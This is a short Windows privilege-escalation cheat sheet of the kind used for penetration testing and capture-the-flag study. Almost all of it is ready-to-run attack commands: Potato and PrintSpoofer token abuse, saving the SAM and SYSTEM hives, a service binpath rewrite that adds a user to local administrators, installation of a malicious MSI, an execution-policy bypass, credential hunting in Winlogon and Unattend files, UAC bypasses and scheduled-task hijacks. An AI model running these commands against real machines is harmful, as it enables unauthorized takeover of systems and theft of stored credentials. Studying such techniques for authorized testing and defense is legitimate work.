Manual Windows privilege escalation — enumeration, token/Potato attacks (PrintSpoofer/GodPotato), service misconfigurations, AlwaysInstallElevated, credential hunting, UAC bypasses, kernel exploits and scheduled-task/autorun hijacks.
whoami /all
whoami /priv
systeminfo; wmic qfe get HotFixID
net user; net localgroup administrators
powershell -ep bypass -c "IEX(...);Invoke-AllChecks"
PrintSpoofer.exe -i -c cmd
GodPotato -cmd "cmd /c whoami"
JuicyPotatoNG.exe -t * -p cmd.exe
SeBackupPrivilege -> reg save hklm\sam sam; reg save hklm\system system
wmic service get name,pathname,startmode | findstr /i /v "c:\windows\\" | findstr /i """
accesschk.exe -uwcqv "Everyone" * /accepteula
sc config <svc> binpath= "cmd /c net localgroup administrators user /add"
writable service .exe -> replace it, then restart the service
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msiexec /quiet /qn /i evil.msi
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
cmdkey /list -> runas /savecred /user:admin cmd
findstr /si password *.xml *.ini *.txt *.config
type C:\Windows\Panther\Unattend.xml
GPP cPassword in SYSVOL (Groups.xml)
fodhelper.exe registry UAC bypass
eventvwr.exe / sdclt UAC bypass
systeminfo | wesng / watson
PrintNightmare (CVE-2021-1675/34527)
schtasks /query /fo LIST /v | findstr /i "Task To Run Run As User"
writable task binary -> replace it before it runs
autorunsc.exe -a * -accepteula